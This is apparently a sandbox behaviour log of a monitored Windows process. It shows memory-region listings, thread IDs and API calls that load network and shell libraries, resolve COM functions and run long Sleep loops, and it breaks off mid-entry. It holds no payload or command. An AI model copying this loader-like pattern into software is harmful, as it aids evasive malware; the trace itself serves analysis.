"private_0x0000000000400000" filename = "" Region: id = 11232 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11233 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11234 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11235 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11236 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11237 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11238 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11239 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11240 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11241 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11242 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11243 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11244 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11245 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11246 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11247 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11248 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11249 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11250 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11251 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11252 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11253 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11254 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11255 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11256 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11257 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11258 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11259 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11260 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11261 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11262 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11263 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11264 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11265 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11266 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11267 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11268 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11269 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11270 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11271 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11272 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11273 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11274 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11275 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11276 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11277 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11278 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11279 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11280 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11281 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11282 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11283 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11284 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11285 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11286 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11287 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11288 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11289 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11290 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11291 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11292 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11293 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11294 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11295 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11296 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11297 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11298 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Thread: id = 5 os_tid = 0x13b8 Thread: id = 6 os_tid = 0xf0 Thread: id = 7 os_tid = 0x474 Thread: id = 8 os_tid = 0xdac Thread: id = 9 os_tid = 0x29c Thread: id = 10 os_tid = 0x7c8 Thread: id = 11 os_tid = 0xbec Thread: id = 12 os_tid = 0xd78 Thread: id = 13 os_tid = 0x320 Thread: id = 14 os_tid = 0xc94 Thread: id = 15 os_tid = 0xc0c Thread: id = 16 os_tid = 0xf8c Thread: id = 17 os_tid = 0xf70 Thread: id = 18 os_tid = 0xf20 Thread: id = 19 os_tid = 0x4dc Thread: id = 20 os_tid = 0x55c Thread: id = 21 os_tid = 0xbfc Thread: id = 22 os_tid = 0xbf8 Thread: id = 23 os_tid = 0xbf4 Thread: id = 24 os_tid = 0xbe4 Thread: id = 25 os_tid = 0xbe0 Thread: id = 26 os_tid = 0xbb0 Thread: id = 27 os_tid = 0xa9c Thread: id = 28 os_tid = 0x6d0 Thread: id = 29 os_tid = 0x7f8 Thread: id = 30 os_tid = 0x7a4 Thread: id = 31 os_tid = 0x72c Thread: id = 32 os_tid = 0x728 Thread: id = 33 os_tid = 0x724 Thread: id = 34 os_tid = 0x720 Thread: id = 35 os_tid = 0x6fc Thread: id = 36 os_tid = 0x6ec Thread: id = 37 os_tid = 0x6e8 Thread: id = 38 os_tid = 0x6d0 Thread: id = 39 os_tid = 0x6cc Thread: id = 40 os_tid = 0x6c0 Thread: id = 41 os_tid = 0x6bc Thread: id = 42 os_tid = 0x6ac Thread: id = 43 os_tid = 0x690 Thread: id = 44 os_tid = 0x688 Thread: id = 45 os_tid = 0x684 Thread: id = 46 os_tid = 0x680 Thread: id = 47 os_tid = 0x66c Thread: id = 48 os_tid = 0x654 Thread: id = 49 os_tid = 0x640 Thread: id = 50 os_tid = 0x634 Thread: id = 51 os_tid = 0x61c Thread: id = 52 os_tid = 0x2d0 [0119.952] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffd504d0000 [0119.954] GetProcAddress (hModule=0x7ffd504d0000, lpProcName="RtlExitUserThread") returned 0x7ffd5052c2a0 [0119.958] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x9210000 [0122.071] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10) returned 0x9210830 [0122.071] LoadLibraryA (lpLibFileName="user32") returned 0x7ffd4e9d0000 [0122.072] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x10 [0122.082] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.086] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9210830 [0122.086] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffd4e480000 [0122.087] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x12 [0122.087] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.087] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10) returned 0x9210830 [0122.087] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffd41100000 [0122.088] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x10 [0122.088] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.088] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0xf) returned 0x9210830 [0122.088] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffd50380000 [0122.089] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0xf [0122.089] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.089] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x11) returned 0x9210830 [0122.089] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffd46920000 [0122.091] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x11 [0122.091] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.091] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10) returned 0x9210830 [0122.091] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffd4e270000 [0122.092] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x10 [0122.092] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.092] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10) returned 0x9210830 [0122.092] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffd4b670000 [0122.093] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x10 [0122.093] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.093] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x11) returned 0x9210830 [0122.093] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffd4eb30000 [0122.094] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210830) returned 0x11 [0122.094] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210830) returned 1 [0122.095] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffd4dc70000 [0122.096] GetProcAddress (hModule=0x7ffd4dc70000, lpProcName="CoInitializeEx") returned 0x7ffd4dcd2c50 [0122.097] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffd4dc70000 [0122.098] GetProcAddress (hModule=0x7ffd4dc70000, lpProcName="CoInitializeSecurity") returned 0x7ffd4dca5fe0 [0122.099] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffd4dc70000 [0122.102] GetProcAddress (hModule=0x7ffd4dc70000, lpProcName="CoCreateInstance") returned 0x7ffd4dd0fb70 [0122.103] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffd4dc70000 [0122.105] GetProcAddress (hModule=0x7ffd4dc70000, lpProcName="CoUninitialize") returned 0x7ffd4dcd1540 [0122.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x423ca4, lpParameter=0x410000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1bf0 [0122.106] CloseHandle (hObject=0x1bf0) returned 1 [0122.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x423d80, lpParameter=0x410000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1bf0 [0122.106] CloseHandle (hObject=0x1bf0) returned 1 [0122.106] Sleep (dwMilliseconds=0xa) [0122.297] Sleep (dwMilliseconds=0xa) [0122.443] Sleep (dwMilliseconds=0xa) [0122.453] Sleep (dwMilliseconds=0xa) [0122.464] Sleep (dwMilliseconds=0xa) [0122.517] Sleep (dwMilliseconds=0xa) [0122.544] Sleep (dwMilliseconds=0xa) [0122.555] Sleep (dwMilliseconds=0xa) [0122.566] Sleep (dwMilliseconds=0xa) [0122.577] Sleep (dwMilliseconds=0xa) [0122.587] Sleep (dwMilliseconds=0xa) [0122.598] Sleep (dwMilliseconds=0xa) [0122.608] Sleep (dwMilliseconds=0xa) [0122.762] Sleep (dwMilliseconds=0xa) [0122.866] Sleep (dwMilliseconds=0xa) [0122.972] Sleep (dwMilliseconds=0xa) [0122.982] Sleep (dwMilliseconds=0xa) [0122.993] Sleep (dwMilliseconds=0xa) [0123.038] Sleep (dwMilliseconds=0xa) [0123.048] Sleep (dwMilliseconds=0xa) [0123.059] Sleep (dwMilliseconds=0xa) [0123.069] Sleep (dwMilliseconds=0xa) [0123.084] Sleep (dwMilliseconds=0xa) [0123.182] Sleep (dwMilliseconds=0xa) [0123.230] Sleep (dwMilliseconds=0xa) [0123.249] Sleep (dwMilliseconds=0xa) [0123.260] Sleep (dwMilliseconds=0xa) [0123.362] Sleep (dwMilliseconds=0xa) [0123.383] Sleep (dwMilliseconds=0xa) [0123.472] Sleep (dwMilliseconds=0xa) [0123.483] Sleep (dwMilliseconds=0xa) [0123.493] Sleep (dwMilliseconds=0xa) [0123.505] Sleep (dwMilliseconds=0xa) [0123.515] Sleep (dwMilliseconds=0xa) [0123.582] Sleep (dwMilliseconds=0xa) [0123.603] Sleep (dwMilliseconds=0xa) [0123.665] Sleep (dwMilliseconds=0xa) [0123.804] Sleep (dwMilliseconds=0xa) [0123.844] Sleep (dwMilliseconds=0xa) [0123.954] Sleep (dwMilliseconds=0xa) [0124.000] Sleep (dwMilliseconds=0xa) [0124.027] Sleep (dwMilliseconds=0xa) [0124.038] Sleep (dwMilliseconds=0xa) [0124.048] Sleep (dwMilliseconds=0xa) [0124.059] Sleep (dwMilliseconds=0xa) [0124.075] Sleep (dwMilliseconds=0xa) [0124.154] Sleep (dwMilliseconds=0xa) [0124.241] Sleep (dwMilliseconds=0xa) [0124.310] Sleep (dwMilliseconds=0xa) [0124.422] Sleep (dwMilliseconds=0xa) [0124.446] Sleep (dwMilliseconds=0xa) [0124.539] Sleep (dwMilliseconds=0xa) [0124.655] Sleep (dwMilliseconds=0xa) [0124.687] Sleep (dwMilliseconds=0xa) [0124.698] Sleep (dwMilliseconds=0xa) [0124.708] Sleep (dwMilliseconds=0xa) [0124.817] Sleep (dwMilliseconds=0xa) [0124.828] Sleep (dwMilliseconds=0xa) [0124.838] Sleep (dwMilliseconds=0xa) [0124.931] Sleep (dwMilliseconds=0xa) [0124.942] Sleep (dwMilliseconds=0xa) [0124.953] Sleep (dwMilliseconds=0xa) [0124.963] Sleep (dwMilliseconds=0xa) [0124.974] Sleep (dwMilliseconds=0xa) [0124.985] Sleep (dwMilliseconds=0xa) [0124.995] Sleep (dwMilliseconds=0xa) [0125.006] Sleep (dwMilliseconds=0xa) [0125.017] Sleep (dwMilliseconds=0xa) [0125.027] Sleep (dwMilliseconds=0xa) [0125.114] Sleep (dwMilliseconds=0xa) [0125.225] Sleep (dwMilliseconds=0xa) [0125.259] Sleep (dwMilliseconds=0xa) [0125.367] Sleep (dwMilliseconds=0xa) [0125.387] Sleep (dwMilliseconds=0xa) [0125.398] Sleep (dwMilliseconds=0xa) [0125.429] Sleep (dwMilliseconds=0xa) [0125.440] Sleep (dwMilliseconds=0xa) [0125.451] Sleep (dwMilliseconds=0xa) [0125.461] Sleep (dwMilliseconds=0xa) [0125.472] Sleep (dwMilliseconds=0xa) [0125.576] Sleep (dwMilliseconds=0xa) [0125.655] Sleep (dwMilliseconds=0xa) [0125.665] Sleep (dwMilliseconds=0xa) [0125.783] Sleep (dwMilliseconds=0xa) [0125.932] Sleep (dwMilliseconds=0xa) [0125.961] Sleep (dwMilliseconds=0xa) [0126.035] Sleep (dwMilliseconds=0xa) [0126.046] Sleep (dwMilliseconds=0xa) [0126.056] Sleep (dwMilliseconds=0xa) [0126.069] Sleep (dwMilliseconds=0xa) [0126.080] Sleep (dwMilliseconds=0xa) [0126.173] Sleep (dwMilliseconds=0xa) [0126.215] Sleep (dwMilliseconds=0xa) [0126.248] Sleep (dwMilliseconds=0xa) [0126.356] Sleep (dwMilliseconds=0xa) [0126.377] Sleep (dwMilliseconds=0xa) [0126.388] Sleep (dwMilliseconds=0xa) [0126.398] Sleep (dwMilliseconds=0xa) [0126.494] Sleep (dwMilliseconds=0xa) [0126.528] Sleep (dwMilliseconds=0xa) [0126.558] Sleep (dwMilliseconds=0xa) [0126.568] Sleep (dwMilliseconds=0xa) [0126.579] Sleep (dwMilliseconds=0xa) [0126.589] Sleep (dwMilliseconds=0xa) [0126.600] Sleep (dwMilliseconds=0xa) [0126.610] Sleep (dwMilliseconds=0xa) [0126.621] Sleep (dwMilliseconds=0xa) [0126.740] Sleep (dwMilliseconds=0xa) [0126.818] Sleep (dwMilliseconds=0xa) [0126.899] Sleep (dwMilliseconds=0xa) [0127.025] Sleep (dwMilliseconds=0xa) [0127.035] Sleep (dwMilliseconds=0xa) [0127.046] Sleep (dwMilliseconds=0xa) [0127.081] Sleep (dwMilliseconds=0xa) [0127.092] Sleep (dwMilliseconds=0xa) [0127.103] Sleep (dwMilliseconds=0xa) [0127.114] Sleep (dwMilliseconds=0xa) [0127.124] Sleep (dwMilliseconds=0xa) [0127.135] Sleep (dwMilliseconds=0xa) [0127.145] Sleep (dwMilliseconds=0xa) [0127.259] Sleep (dwMilliseconds=0xa) [0127.317] Sleep (dwMilliseconds=0xa) [0127.353] Sleep (dwMilliseconds=0xa) [0127.460] Sleep (dwMilliseconds=0xa) [0127.471] Sleep (dwMilliseconds=0xa) [0127.481] Sleep (dwMilliseconds=0xa) [0127.572] Sleep (dwMilliseconds=0xa) [0127.582] Sleep (dwMilliseconds=0xa) [0127.593] Sleep (dwMilliseconds=0xa) [0127.605] Sleep (dwMilliseconds=0xa) [0127.658] Sleep (dwMilliseconds=0xa) [0127.737] Sleep (dwMilliseconds=0xa) [0127.845] Sleep (dwMilliseconds=0xa) [0127.883] Sleep (dwMilliseconds=0xa) [0127.994] Sleep (dwMilliseconds=0xa) [0128.006] Sleep (dwMilliseconds=0xa) [0128.017] Sleep (dwMilliseconds=0xa) [0128.073] Sleep (dwMilliseconds=0xa) [0128.084] Sleep (dwMilliseconds=0xa) [0128.094] Sleep (dwMilliseconds=0xa) [0128.105] Sleep (dwMilliseconds=0xa) [0128.249] Sleep (dwMilliseconds=0xa) [0128.296] Sleep (dwMilliseconds=0xa) [0128.349] Sleep (dwMilliseconds=0xa) [0128.458] Sleep (dwMilliseconds=0xa) [0128.494] Sleep (dwMilliseconds=0xa) [0128.602] Sleep (dwMilliseconds=0xa) [0128.632] Sleep (dwMilliseconds=0xa) [0128.664] Sleep (dwMilliseconds=0xa) [0128.674] Sleep (dwMilliseconds=0xa) [0128.685] Sleep (dwMilliseconds=0xa) [0128.696] Sleep (dwMilliseconds=0xa) [0128.707] Sleep (dwMilliseconds=0xa) [0128.730] Sleep (dwMilliseconds=0xa) [0128.741] Sleep (dwMilliseconds=0xa) [0128.845] Sleep (dwMilliseconds=0xa) [0128.921] Sleep (dwMilliseconds=0xa) [0128.945] Sleep (dwMilliseconds=0xa) [0129.053] Sleep (dwMilliseconds=0xa) [0129.064] Sleep (dwMilliseconds=0xa) [0129.074] Sleep (dwMilliseconds=0xa) [0129.111] Sleep (dwMilliseconds=0xa) [0129.122] Sleep (dwMilliseconds=0xa) [0129.134] Sleep (dwMilliseconds=0xa) [0129.144] Sleep (dwMilliseconds=0xa) [0129.155] Sleep (dwMilliseconds=0xa) [0129.204] Sleep (dwMilliseconds=0xa) [0129.264] Sleep (dwMilliseconds=0xa) [0129.362] Sleep (dwMilliseconds=0xa) [0129.470] Sleep (dwMilliseconds=0xa) [0129.504] Sleep (dwMilliseconds=0xa) [0129.603] Sleep (dwMilliseconds=0xa) [0129.647] Sleep (dwMilliseconds=0xa) [0129.658] Sleep (dwMilliseconds=0xa) [0129.668] Sleep (dwMilliseconds=0xa) [0129.684] Sleep (dwMilliseconds=0xa) [0129.694] Sleep (dwMilliseconds=0xa) [0129.713] Sleep (dwMilliseconds=0xa) [0129.737] Sleep (dwMilliseconds=0xa) [0129.859] Sleep (dwMilliseconds=0xa) [0129.869] Sleep (dwMilliseconds=0xa) [0129.880] Sleep (dwMilliseconds=0xa) [0129.972] Sleep (dwMilliseconds=0xa) [0129.983] Sleep (dwMilliseconds=0xa) [0129.994] Sleep (dwMilliseconds=0xa) [0130.055] Sleep (dwMilliseconds=0xa) [0130.065] Sleep (dwMilliseconds=0xa) [0130.077] Sleep (dwMilliseconds=0xa) [0130.088] Sleep (dwMilliseconds=0xa) [0130.099] Sleep (dwMilliseconds=0xa) [0130.110] Sleep (dwMilliseconds=0xa) [0130.191] Sleep (dwMilliseconds=0xa) [0130.224] Sleep (dwMilliseconds=0xa) [0130.278] Sleep (dwMilliseconds=0xa) [0130.397] Sleep (dwMilliseconds=0xa) [0130.408] Sleep (dwMilliseconds=0xa) [0130.443] Sleep (dwMilliseconds=0xa) [0130.668] Sleep (dwMilliseconds=0xa) [0130.747] Sleep (dwMilliseconds=0xa) [0130.757] Sleep (dwMilliseconds=0xa) [0130.767] Sleep (dwMilliseconds=0xa) [0130.778] Sleep (dwMilliseconds=0xa) [0130.789] Sleep (dwMilliseconds=0xa) [0130.799] Sleep (dwMilliseconds=0xa) [0130.809] Sleep (dwMilliseconds=0xa) [0130.820] Sleep (dwMilliseconds=0xa) [0130.853] Sleep (dwMilliseconds=0xa) [0130.954] Sleep (dwMilliseconds=0xa) [0130.964] Sleep (dwMilliseconds=0xa) [0130.975] Sleep (dwMilliseconds=0xa) [0131.077] Sleep (dwMilliseconds=0xa) [0131.088] Sleep (dwMilliseconds=0xa) [0131.098] Sleep (dwMilliseconds=0xa) [0131.147] Sleep (dwMilliseconds=0xa) [0131.231] Sleep (dwMilliseconds=0xa) [0131.242] Sleep (dwMilliseconds=0xa) [0131.295] Sleep (dwMilliseconds=0xa) [0131.406] Sleep (dwMilliseconds=0xa) [0131.520] Sleep (dwMilliseconds=0xa) [0131.558] Sleep (dwMilliseconds=0xa) [0131.666] Sleep (dwMilliseconds=0xa) [0131.751] Sleep (dwMilliseconds=0xa) [0131.762] Sleep (dwMilliseconds=0xa) [0131.772] Sleep (dwMilliseconds=0xa) [0131.783] Sleep (dwMilliseconds=0xa) [0131.793] Sleep (dwMilliseconds=0xa) [0131.804] Sleep (dwMilliseconds=0xa) [0131.814] Sleep (dwMilliseconds=0xa) [0131.825] Sleep (dwMilliseconds=0xa) [0131.836] Sleep (dwMilliseconds=0xa) [0131.846] Sleep (dwMilliseconds=0xa) [0131.856] Sleep (dwMilliseconds=0xa) [0131.965] Sleep (dwMilliseconds=0xa) [0132.062] Sleep (dwMilliseconds=0xa) [0132.169] Sleep (dwMilliseconds=0xa) [0132.204] Sleep (dwMilliseconds=0xa) [0132.257] Sleep (dwMilliseconds=0xa) [0132.291] Sleep (dwMilliseconds=0xa) [0132.302] Sleep (dwMilliseconds=0xa) [0132.312] Sleep (dwMilliseconds=0xa) [0132.333] Sleep (dwMilliseconds=0xa) [0132.343] Sleep (dwMilliseconds=0xa) [0132.367] Sleep (dwMilliseconds=0xa) [0132.426] Sleep (dwMilliseconds=0xa) [0132.437] Sleep (dwMilliseconds=0xa) [0132.448] Sleep (dwMilliseconds=0xa) [0132.564] Sleep (dwMilliseconds=0xa) [0132.577] Sleep (dwMilliseconds=0xa) [0132.588] Sleep (dwMilliseconds=0xa) [0132.675] Sleep (dwMilliseconds=0xa) [0132.685] Sleep (dwMilliseconds=0xa) [0132.696] Sleep (dwMilliseconds=0xa) [0132.708] Sleep (dwMilliseconds=0xa) [0132.732] Sleep (dwMilliseconds=0xa) [0132.743] Sleep (dwMilliseconds=0xa) [0132.753] Sleep (dwMilliseconds=0xa) [0132.764] Sleep (dwMilliseconds=0xa) [0132.774] Sleep (dwMilliseconds=0xa) [0132.801] Sleep (dwMilliseconds=0xa) [0132.812] Sleep (dwMilliseconds=0xa) [0132.823] Sleep (dwMilliseconds=0xa) [0132.951] Sleep (dwMilliseconds=0xa) [0132.961] Sleep (dwMilliseconds=0xa) [0132.972] Sleep (dwMilliseconds=0xa) [0133.055] Sleep (dwMilliseconds=0xa) [0133.065] Sleep 